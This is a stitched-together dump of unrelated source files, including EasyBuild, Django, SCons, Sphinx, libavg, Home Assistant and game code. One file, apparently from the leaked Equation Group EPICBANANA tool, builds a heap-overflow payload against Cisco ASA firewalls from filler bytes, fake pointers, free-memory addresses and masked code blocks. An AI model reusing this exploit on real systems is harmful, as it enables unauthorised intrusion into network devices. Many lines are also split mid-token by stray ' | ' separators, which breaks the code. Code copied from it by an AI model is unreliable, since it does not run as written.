'runtest': ["tests TESTFLAGS='-u -q'", "Run tests included with PSI, without interruption.", BUILD],
})
# Doesn't work with out-of-source build
extra_vars['separate_build_dir'][0] = False
return extra_vars
def configure_step(self):
"""
Configure build outside of source directory.
"""
try:
objdir = os.path.join(self.builddir, 'obj')
os.makedirs(objdir)
os.chdir( | objdir)
except OSError as err:
raise EasyBuildError("Failed to prepare for configuration of PSI build: %s", err)
env.setvar('F77FLAGS', os.getenv('F90FLAGS'))
# In order to create new plugins with PSI, it needs to know the location of the source
# and the obj dir after install. These env vars give that information to the | configure script.
self.psi_srcdir = os.path.basename(self.cfg['start_dir'].rstrip(os.sep))
self.install_psi_objdir = os.path.join(self.installdir, 'obj')
self.install_psi_srcdir = os.path.join(self.installdir, self.psi_srcdir)
env.setvar('PSI_OBJ_INSTALL_DIR', self.install_psi_objdir)
env.setvar('PSI_SRC_INSTALL_DIR', self.install_psi_srcdir)
        # explicitly specify Python binary to use
pythonroot = get_software_root('Python')
if not pythonroot:
raise EasyBuildError("Python module not loaded.")
# pre 4.0b5, they were using autotools, on newer it's CMake
if LooseVersion(self.version) <= LooseVersion("4.0b5") and self.name == "PSI":
# Use EB Boost
boostroot = get_software_root('Boost')
if not boostroot:
raise EasyBuildError("Boost module not loaded.")
self.log.info("Using configure based build")
env.setvar('PYTHON', os.path.join(pythonroot, 'bin', 'python'))
env.setvar('USE_SYSTEM_BOOST', 'TRUE')
if self.toolchain.options.get('usempi', None):
# PSI doesn't require a Fortran compiler itself, but may require it to link to BLAS/LAPACK correctly
# we should always specify the sequential Fortran compiler,
# to avoid problems with -lmpi vs -lmpi_mt during linking
fcompvar = 'F77_SEQ'
else:
fcompvar = 'F77'
# update configure options
# using multi-threaded BLAS/LAPACK is important for performance,
# cfr. http://sirius.chem.vt.edu/psi4manual/latest/installfile.html#sec-install-iii
opt_vars = [
('cc', 'CC'),
('cxx', 'CXX'),
('fc', fcompvar),
('libdirs', 'LDFLAGS'),
('blas', 'LIBBLAS_MT'),
('lapack', 'LIBLAPACK_MT'),
]
for (opt, var) in opt_vars:
self.cfg.update('configopts', "--with-%s='%s'" % (opt, os.getenv(var)))
# -DMPICH_IGNORE_CXX_SEEK dances around problem with order of stdio.h and mpi.h headers
# both define SEEK_SET, this makes the one for MPI be ignored
self.cfg.update('configopts', "--with-opt='%s -DMPICH_IGNORE_CXX_SEEK'" % os.getenv('CFLAGS'))
# specify location of Boost
self.cfg.update('configopts', "--with-boost=%s" % boostroot)
# enable support for plugins
self.cfg.update('configopts', "--with-plugins")
ConfigureMake.configure_step(self, cmd_prefix=self.cfg['start_dir'])
else:
self.log.info("Using CMake based build")
self.cfg.update('configopts', ' -DPYTHON_EXECUTABLE=%s' % os.path.join(pythonroot, 'bin', 'python'))
if self.name == 'PSI4' and LooseVersion(self.version) >= LooseVersion("1.2"):
self.log.info("Remove the CMAKE_BUILD_TYPE test in PSI4 source and the downloaded dependencies!")
self.log.info("Use PATCH_COMMAND in the corresponding CMakeLists.txt")
self.cfg['build_type'] = 'EasyBuildRelease'
if self.toolchain.options.get('usempi', None):
self.cfg.update('configopts', " -DENABLE_MPI=ON")
if get_software_root('imkl'):
self.cfg.update('configopts', " -DENABLE_CSR=ON -DBLAS_TYPE=MKL")
if self.name == 'PSI4':
pcmsolverroot = get_software_root('PCMSolver')
if pcmsolverroot:
if LooseVersion(self.version) >= LooseVersion("1.1"):
pcmsolver = 'PCMSolver'
else:
pcmsolver = 'PCMSOLVER'
self.cfg.update('configopts', " -DENABLE_%s=ON" % pcmsolver)
if LooseVersion(self.version) < LooseVersion("1.2"):
self.cfg.update('configopts', " -DPCMSOLVER_ROOT=%s" % pcmsolverroot)
else:
self.cfg.update('configopts', " -DCMAKE_INSIST_FIND_PACKAGE_PCMSolver=ON "
"-DPCMSolver_DIR=%s/share/cmake/PCMSolver" % pcmsolverroot)
chempsroot = get_software_root('CheMPS2')
if chempsroot:
if LooseVersion(self.version) >= LooseVersion("1.1"):
chemps2 = 'CheMPS2'
else:
chemps2 = 'CHEMPS2'
self.cfg.update('configopts', " -DENABLE_%s=ON" % chemps2)
if LooseVersion(self.version) < LooseVersion("1.2"):
self.cfg.update('configopts', " -DCHEMPS2_ROOT=%s" % chempsroot)
else:
self.cfg.update('configopts', " -DCMAKE_INSIST_FIND_PACKAGE_CheMPS2=ON "
"-DCheMPS2_DIR=%s/share/cmake/CheMPS2" % chempsroot)
# Be aware, PSI4 wa |
tshirtman/ultimate-smash-friends | usf/screens/network_game_conf_screen.py | Python | gpl-3.0 | 6,713 | 0.006108 | ################################################################################
# copyright 2010 Lucas Baudin <xapantu@gmail.com> #
# #
# This file is part of Ultimate Smash Friends. #
# #
# Ultimate Smash Friends is free software: you can redistribute it and/or #
# modify it under the terms of the GNU General Public License as published by #
# the Free Software Foundation, either version 3 of the License, or (at your #
# option) any later version. #
# #
# Ultimate Smash Friends is distributed in the hope that it will be useful, but#
# WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or#
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for #
# more details. #
# #
# You should have received a copy of the GNU General Public License along with #
# Ultimate Smash Friends. If not, see <http://www.gnu.org/licenses/>. #
################################################################################
'''
Show the connected users list, player choices and level choice for a network game.
This screen should look identical to the player hosting the game and to the
player(s) joining it, except that each player can only choose his own character.
The level can be chosen by either player; the game starts when both players have
clicked the "start game" button (maybe with some time delay, and with the
possibility to cancel?).
'''
from usf.screens.screen import Screen
from usf import CONFIG
from usf.widgets.box import VBox, HBox
from usf.widgets.button import Button
from usf.widgets.image import Image
from usf.widgets.spinner import Spinner
from usf.widgets.label import Label
from usf.widgets.checkbox_text import TextCheckBox
from usf.widgets.text_entry import TextEntry
from usf.widgets.coverflow import Coverflow
from usf.translation import _
from usf import entity_skin
import os
from os.path import join
import logging
class NetworkGameConfScreen(Screen):
""" the network game configuration screen
"""
name_pl1 = 0
name_pl2 = 0
name_pl3 = 0
name_pl4 = 0
players = [0, 0, 0, 0]
def init(self):
self.game_data = {}
self.game_data['character_file'] = []
#I18N: The title of the screen where players can choose their character.
self.name = _("characters")
#create a character file to have the [?] image
self.game_data['character_file'].append(join('characters', 'none'))
self.character = []
#I18N: in the character screen, to select no character for this player
#I18N: (with the [?] icon)
self.character.append(_("None"))
#create a character for every directory in the characters directory.
files = os.listdir(join(CONFIG.system_path, 'characters'))
files.sort()
self.load_chararacters(files)
self.add(VBox())
self.portrait = Image(join(self.game_data['character_file'][0],
"portrait.png"))
self.player_spinner = Spinner(self.character)
player_vbox = VBox()
player_vbox.add(Label(_('Player name'), align='center'))
player_vbox.add(TextEntry(_('unnamed player')))
player_vbox.add(Spinner(self.character))
player_vbox.add(self.portrait, margin_left=65, margin=5, size=(50, 50))
hbox = HBox()
# adding the two box which contains the spinner and the name of the
# characters
hbox.add(player_vbox, margin=400)
self.widget.add(hbox, margin=150)
#create a level image for every directory in the level directory.
files = os.listdir(os.path.join( CONFIG.system_path, 'levels'))
files.sort()
coverflow_data = self.load_levels(files)
self.coverflow = Coverflow(coverflow_data)
self.widget.add(self.coverflow, size=(800, 275))
#next button to go to the level screen
self.widget.add(Button(_("Start")),
margin=83,
align="center")
#back button to come back to main screen
self.widget.add(Button(_('Back')),
margin=20,
align="center")
def load_chararacters(self, files):
""" append characters to self.character, loaded from files in "files".
"""
for f in files:
try:
if f != "none":
self.game_data['character_file'].append(join(
"characters",
f))
self.character.append(entity_skin.EntitySkin(
join('characters', f)).name)
except OSError, e:
if e.errno is 20:
pass
else:
raise
except IOError, e:
pass
def load_levels(self, files):
""" append a level in self.levels
"""
coverflow_data = []
for f in files:
try:
if 'level.xml' in os.listdir(
os.path.join(CONFIG.system_path, "levels", f)):
coverflow_data.append([])
coverflow_data[-1].append(f)
coverflow_data[-1].append(
join(
CONFIG.system_path,
"levels", f, "screenshot.png"))
except:
#XXX: catch all exceptions: BAD
logging.debug(str(f) +" is not a valid level.")
return coverflow_data
def callback(self, action):
if action is self.player_spinner :
| #get the index of the player
player_number = self.player_spinner.index(action)
self.players[player_number] = action.get_index()
#change the portrait
self.portraits[player_number].setImage(
join(
self.game_data['character_file'][action.get_index()],
"portrait.png"))
if action.text == _("Start"):
i = 0
| for player in self.players:
if player != 0:
i += 1
if i > 1:
return {'goto': 'level'}
if action.text == _('Back'):
return {'goto': 'back'}
|
CARocha/addac_fadcanic | lugar/admin.py | Python | gpl-3.0 | 567 | 0.021164 | from django.contrib import admin
from lugar.models import Departamento, Municipio, Microcuenca, Comunidad
class ComunidadAdmin(admin.ModelAdmin):
list_display = ['nombre', 'municipio']
class DepartamentoAdmin(admin.ModelAdmin):
pass
class MicrocuencaAdmin | (admin.ModelAdmin):
pass
class MunicipioAdmin(admin.ModelAdmin):
list_display = ['nombre', 'departamento']
admin.site.register(Departamento,DepartamentoAdmin )
admin.site.register(Municipio, MunicipioAdmin)
admin.site.register(Microcuenca,MicrocuencaAdmin)
admin.site.register(Comunidad, Co | munidadAdmin)
|
makinacorpus/mapnik2 | scons/scons-local-1.2.0/SCons/Tool/packaging/targz.py | Python | lgpl-2.1 | 1,677 | 0.002385 | """SCons.Tool.Packaging.targz
The targz SRC packager.
"""
#
# Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__ | revision__ = "src/engine/SCons/Tool/packaging/targz.py 3842 2008/12/20 22:59:52 scons"
from SCons.Tool.packaging import stripinstallbuilder, putintopackageroot
de | f package(env, target, source, PACKAGEROOT, **kw):
bld = env['BUILDERS']['Tar']
bld.set_suffix('.tar.gz')
target, source = stripinstallbuilder(target, source, env)
target, source = putintopackageroot(target, source, env, PACKAGEROOT)
return bld(env, target, source, TARFLAGS='-zc')
|
googleapis/python-talent | samples/generated_samples/jobs_v4_generated_company_service_delete_company_sync.py | Python | apache-2.0 | 1,376 | 0.000727 | # -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Generated code. DO NOT EDIT!
#
# Snippet for DeleteCompany
# NOTE: This snippet has been automatically generated for illustrative purposes only.
# It may require modifications to work in your environment.
# To install the latest published package dependency, execute the following:
# python3 -m pip install google-cloud-talent
# [START jobs_v4_generated_CompanyServic | e_DeleteCompany_sync]
from google.cloud import talent_v4
def sample_delete_company():
# Create a client
client = talent_v4.CompanyServiceClient()
# Initialize request argument(s)
request = talent_v4.DeleteCompanyRequest(
name="name_value | ",
)
# Make the request
client.delete_company(request=request)
# [END jobs_v4_generated_CompanyService_DeleteCompany_sync]
|
bwhite/hadoopy | doc/conf.py | Python | gpl-3.0 | 6,505 | 0.006303 | # -*- coding: utf-8 -*-
#
# Hadoopy documentation build configuration file, created by
# sphinx-quickstart on Sat Jan 15 20:41:41 2011.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.append(os.path.abspath('../../hadoopy'))
sys.path.append(os.path.abspath('../../hadoopy/hadoopy/'))
# -- General configuration -----------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.viewcode', 'sphinx.ext.autodoc', 'sphinx.ext.doctest', 'sphinx.ext.todo', 'sphinx.ext.coverage', 'sphinx.ext.pngmath']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Hadoopy'
copyright = u'2012, Brandyn White'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '.0.6.0'
# The full version, including alpha/beta/rc tags.
release = '.0.6.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of documents that shouldn't be included in the build.
#unused_docs = []
# List of directories, relative to source directory, that shouldn't be searched
# for source files.
exclude_trees = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. Major themes that come with
# Sphinx are currently 'default' and 'sphinxdoc'.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
html_logo = 'hadoopy.png'
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_use_modindex = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = ''
# Output file base name for HTML help builder.
htmlhelp_basename = 'Hadoopydoc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the do | cument tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'Hadoopy.tex', u'Hadoopy Documentation',
u'Brandyn White', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
| #latex_use_parts = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_use_modindex = True
|
DarthMaulware/EquationGroupLeaks | Leak #1 - Equation Group Cyber Weapons Auction - Invitation/EQGRP-Free-File/Firewall/EXPLOITS/EPBA/EPICBANANA/versions/asa711.py | Python | unlicense | 2,590 | 0.002317 | from params import *
from util import *
from asa711_loader import *
def payload(params):
block_enc = []
while len(block_enc) == 0:
mask_byte = ord(rand_byte()) # one byte, used as an int
#print "trying to mask data with 0x%02x" % mask_byte
block_enc = prepare_blocks(params, mask_byte,
block1_decoder, cleanup, block_decoder, blocks_table, epba_exit,
free_addrs, block)
if block_enc == False:
print "failed to prepare blocks!"
return ""
# prepare the payload
payload = ""
# drop 460 bytes for overflow to offset 1224 in getline
# sequence is K-Y-Y-Y
# 15 blocks of free memory, 13 for code
payload += ctrl_v_escape("\x01" * 336)
payload += ctrl_v_escape(valid_prev) # new prev
payload += ctrl_v_escape(neg_index) # -20
payload += ctrl_v_escape(neg_index) # -20
payload += ctrl_v_escape(free_addrs[0]) # where blob drops
payload += ctrl_v_escape(free_addrs[1]) # first real code drops here
payload += ctrl_v_escape(free_addrs[2])
payload += ctrl_v_escape(free_addrs[3])
payload += ctrl_v_escape(free_addrs[4])
payload += ctrl_v_escape(free_addrs[5])
payload += ctrl_v_escape(free_addrs[6])
payload += ctrl_v_escape(free_addrs[7])
payload += ctrl_v_escape(free_addrs[8])
payload += ctrl_v_escape(free_addrs[9])
payload += ctrl_v_escape(free_addrs[10])
payload += ctrl_v_escape(free_addrs[11])
payload += ctrl_v_escape(free_addrs[12])
payload += ctrl_v_escape(free_addrs[13]) # last real code
payload += ctrl_v_escape(free_addrs[14]) # overwrite the free ptr
payload += ctrl_v_escape("\x01" * 52)
payload += OVERWRITE + KILL + (YANK * 3) + LINEFEED
payload += ctrl_v_escape(block_enc[1]) + LINEFEED
payload += ctrl_v_escape(block_enc[2]) + LINEFEED
payload += ctrl_v_escape(block_enc[3]) + LINEFEED
payload += ctrl_v_escape(block_enc[4]) + LINEFEED
payload += ctrl_v_escape(block_enc[5]) + LINEFEED
payload += ctrl_v_escape(block_enc[6]) + LINEFEED
payload += ctrl_v_escape(block_enc[7]) + LINEFEED
payload += ctrl_v_escape(block_enc[8]) + LINEFEED
payload += ctrl_v_escape(block_enc[9]) + LINEFEED
payload += ctrl_v_escape(block_enc[10]) + LINEFEED
payload += ctrl_v_escape(block_ | enc[11]) + LINEFEED
payload += ctrl_v_escape(block_enc[12]) + LINEFEED
payload += ctrl_v_escape(block_enc[13]) + LINEFEED
payload += ctrl_v_escape(block_enc[14]) + LINEFEED
return(p | ayload)
|
fvioz/hil-sample | main.py | Python | apache-2.0 | 572 | 0.006993 | # -*- coding: utf-8 -*-
from hil import Core
from context import AppContext
from apps.vibration.main import Vibration
from apps.voice.main import Voice
from apps.react.mai | n import React
from apps.sound.main import Sound
from apps.dialog.main import Dialog
class Main:
def __init__(self):
super(Main, self).__init__()
self.components = [Vibration, Voice, React, Sound, Dialog]
self.context = AppContext
def run(self):
self.core = Core( | self.components, self.context)
self.core.start()
if __name__ == "__main__":
main = Main()
main.run()
|
LyndonChin/CatyHIS | CatyHIS/settings.py | Python | mit | 2,157 | 0.000464 | """
Django settings for CatyHIS project.
For more information on this file, see
https://docs.djangoproject.com/en/1.7/topics/settings/
For the full list of settings and their values, see
https://docs.djan | goproject.com/en/1.7/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/
# SECURITY WARNING: keep t | he secret key used in production secret!
SECRET_KEY = 'jh40i$ueqp$s7+@e71)s-&c*ek8vgt9atzdz7un6=r9(9^*5+-'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'FormGen',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'CatyHIS.urls'
WSGI_APPLICATION = 'CatyHIS.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.7/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.7/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.7/howto/static-files/
STATIC_URL = '/static/'
TEMPLATE_DIRS = [os.path.join(BASE_DIR, 'templates')]
RES_DIR = os.path.join(BASE_DIR, 'res')
|
hoodie/libavg | src/samples/abort_gestures.py | Python | lgpl-2.1 | 3,317 | 0.006331 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from libavg import avg, gesture, app
import gestures
RESOLUTION = avg.Point2 | D(800, 600)
nodeList = []
nodesEnabled = True
def abortAll():
for node in nodeList:
node.recognizer.abort()
def switchNodesEnabled():
global nodesEnabled
nodesEnabled = not nodesEnabled
for node in nodeList:
node.recognizer.enable(nodesEnabled)
class TapButton(gestures.TextRect):
def __init__(self, text, **kwargs):
super(TapButton, self).__init__(text, **kwargs)
self.recognizer = gesture.TapRecognizer(node=self,
possibleHandle | r=self._onPossible, detectedHandler=self._onDetected,
failHandler=self._onFail)
def _onPossible(self):
self.rect.fillcolor = "FFFFFF"
def _onDetected(self):
self.rect.fillcolor = "000000"
self.rect.color = "00FF00"
def _onFail(self):
self.rect.fillcolor = "000000"
self.rect.color = "FF0000"
class AbortButton(TapButton):
def __init__(self, text, **kwargs):
super(AbortButton, self).__init__(text, **kwargs)
def _onPossible(self):
super(AbortButton, self)._onPossible()
self.words.color = "000000"
def _onDetected(self):
super(AbortButton, self)._onDetected()
abortAll()
self.words.color = "FFFFFF"
def _onFail(self):
super(AbortButton, self)._onFail()
self.words.color = "FFFFFF"
class EnableButton(TapButton):
def __init__(self, text, **kwargs):
super(EnableButton, self).__init__(text, **kwargs)
self.words.color = "FF0000"
def changeText(self):
if(nodesEnabled):
self.words.text = "Disable all"
self.words.color = "FF0000"
else:
self.words.text = "Enable all"
self.words.color = "00FF00"
def _onDetected(self):
super(EnableButton, self)._onDetected()
switchNodesEnabled()
self.changeText()
class GestureDemoDiv(app.MainDiv):
def onInit(self):
avg.WordsNode(text='''a - abort recognition <br/>
d - enable/disable recognition <br/><br/>
or use the buttons on the right side''',
pos=(20, 510), parent=self)
nodeList.append(gestures.HoldNode(text="HoldRecognizer", pos=(20,20),
parent=self))
nodeList.append(gestures.DragNode(text="DragRecognizer<br/>friction",
pos=(200,20), friction=0.05, parent=self))
nodeList.append(gestures.TransformNode(text="TransformRecognizer",
ignoreRotation=False, ignoreScale=False, pos=(380,20), parent=self))
self.abortButton = AbortButton(text="Abort all", pos = (630, 490), parent=self)
self.enableButton = EnableButton(text="Disable all", pos = (630, 540),
parent=self)
app.keyboardmanager.bindKeyDown(text="a", handler=abortAll,
help="abort recognition")
app.keyboardmanager.bindKeyDown(text="d", handler=self.onEnableKey,
help="Enable/disable recognition")
def onEnableKey(self):
switchNodesEnabled()
self.enableButton.changeText()
if __name__ == '__main__':
app.App().run(GestureDemoDiv(), app_resolution="800,600")
|
leppa/home-assistant | homeassistant/components/neato/camera.py | Python | apache-2.0 | 3,990 | 0.000752 | """Support for loading picture from Neato."""
from datetime import timedelta
import logging
from pybotvac.exceptions import NeatoRobotException
from homeassistant.components.camera import Camera
from .const import (
NEATO_DOMAIN,
NEATO_LOGIN,
NEATO_MAP_DATA,
NEATO_ROBOTS,
SCAN_INTERVAL_MINUTES,
)
_LOGGER = logging.getLogger(__name__)
SCAN_INTERVAL = timedelta(minutes=SCAN_INTERVAL_MINUTES)
ATTR_GENERATED_AT = "generated_at"
async def async_setup_platform(hass, config, async_add_entities, discovery_info=None):
"""Set up the Neato Camera."""
pass
async def async_setup_entry(hass, entry, async_add_entities):
"""Set up Neato camera with config entry."""
dev = []
neato = hass.data.get(NEATO_LOGIN)
mapdata = hass.data.get(NEATO_MAP_DATA)
for robot in hass.data[NEATO_ROBOTS]:
if "maps" in robot.traits:
dev.append(NeatoCleaningMap(neato, robot, mapdata))
if not dev:
return
_LOGGER.debug("Adding robots for cleaning maps %s", dev)
async_add_entities(dev, True)
class NeatoCleaningMap(Camera):
"""Neato cleaning map for last clean."""
def __init__(self, neato, r | obot, mapdata):
"""Initialize Neato cleaning map."""
super().__init__ | ()
self.robot = robot
self.neato = neato
self._mapdata = mapdata
self._available = self.neato.logged_in if self.neato is not None else False
self._robot_name = f"{self.robot.name} Cleaning Map"
self._robot_serial = self.robot.serial
self._generated_at = None
self._image_url = None
self._image = None
def camera_image(self):
"""Return image response."""
self.update()
return self._image
def update(self):
"""Check the contents of the map list."""
if self.neato is None:
_LOGGER.error("Error while updating camera")
self._image = None
self._image_url = None
self._available = False
return
_LOGGER.debug("Running camera update")
try:
self.neato.update_robots()
except NeatoRobotException as ex:
if self._available: # Print only once when available
_LOGGER.error("Neato camera connection error: %s", ex)
self._image = None
self._image_url = None
self._available = False
return
image_url = None
map_data = self._mapdata[self._robot_serial]["maps"][0]
image_url = map_data["url"]
if image_url == self._image_url:
_LOGGER.debug("The map image_url is the same as old")
return
try:
image = self.neato.download_map(image_url)
except NeatoRobotException as ex:
if self._available: # Print only once when available
_LOGGER.error("Neato camera connection error: %s", ex)
self._image = None
self._image_url = None
self._available = False
return
self._image = image.read()
self._image_url = image_url
self._generated_at = (map_data["generated_at"].strip("Z")).replace("T", " ")
self._available = True
@property
def name(self):
"""Return the name of this camera."""
return self._robot_name
@property
def unique_id(self):
"""Return unique ID."""
return self._robot_serial
@property
def available(self):
"""Return if the robot is available."""
return self._available
@property
def device_info(self):
"""Device info for neato robot."""
return {"identifiers": {(NEATO_DOMAIN, self._robot_serial)}}
@property
def device_state_attributes(self):
"""Return the state attributes of the vacuum cleaner."""
data = {}
if self._generated_at is not None:
data[ATTR_GENERATED_AT] = self._generated_at
return data
|
bdmod/extreme-subversion | BinarySourcce/subversion-1.6.17/tools/bdb/whatis-rep.py | Python | gpl-2.0 | 1,674 | 0.018519 | #!/usr/bin/env python
#
# Print a description (including data, path, and revision) of the
# specified node reps in a Subversion filesystem. Walks as much of
# the reps table as necessary to locate the data (e.g. does a table
# scan).
# Standard modules
import sys, os, re, codecs
# Local support modules
import skel, svnfs
def main():
progname = os.path.basename(sys.argv[0])
if len(sys.argv) >= 3:
dbhome = os.path.join(sys.argv[1], 'db')
if not os.path.exists(dbhome):
sys.stderr.write("%s: '%s' is not a valid svn repository\n" %
(sys.argv[0], dbhome))
sys.stderr.flush()
sys.exit(1)
rep_ids = sys.argv[2:]
else:
sys.stderr.write("Usage: %s <svn-repository> <rep-id>...\n" % pro | gname)
sys.stderr.flush()
sys.exit(1)
print("%s running on repository '%s'" % (prog | name, dbhome))
print("")
rep_ids = dict.fromkeys(rep_ids)
ctx = svnfs.Ctx(dbhome)
try:
cur = ctx.nodes_db.cursor()
try:
rec = cur.first()
while rec:
if rec[0] != 'next-key':
nid, cid, tid = rec[0].split(".")
nd = skel.Node(rec[1])
if nd.datarep in rep_ids:
rev = skel.Txn(ctx.txns_db[tid]).rev
print("%s: data of '%s%s' in r%s" % (nd.datarep,
nd.createpath, {"dir":'/', "file":''}[nd.kind], rev))
if nd.proprep in rep_ids:
rev = skel.Txn(ctx.txns_db[tid]).rev
print("%s: properties of '%s%s' in r%s" % (nd.datarep,
nd.createpath, {"dir":'/', "file":''}[nd.kind], rev))
rec = cur.next()
finally:
cur.close()
finally:
ctx.close()
if __name__ == '__main__':
main()
|
NaN-tic/nereid | nereid/sessions.py | Python | gpl-3.0 | 3,596 | 0.000556 | #This file is part of Tryton & Nereid. The COPYRIGHT file at the top level of
#this repository contains the full copyright notices and license terms.
from datetime import datetime # noqa
from flask.sessions import SessionInterface, SessionMixin
from werkzeug.contrib.sessions import Session as SessionBase, SessionStore
from flask.globals import current_app
class Session(SessionBase, SessionMixin):
"Nereid Default Session Object"
class NullSession(Session):
"""
Class used to generate nicer error messages if sessions are not
available. Will still allow read-only access to the empty session
but fail on setting.
"""
def _fail(self, *args, **kwargs):
raise RuntimeError('the | session is unavailable | because no secret '
'key was set. Set the secret_key on the '
'application to something unique and secret.')
__setitem__ = __delitem__ = clear = pop = popitem = \
update = setdefault = _fail
del _fail
class MemcachedSessionStore(SessionStore):
"""
Session store that stores session on memcached
:param session_class: The session class to use.
Defaults to :class:`Session`.
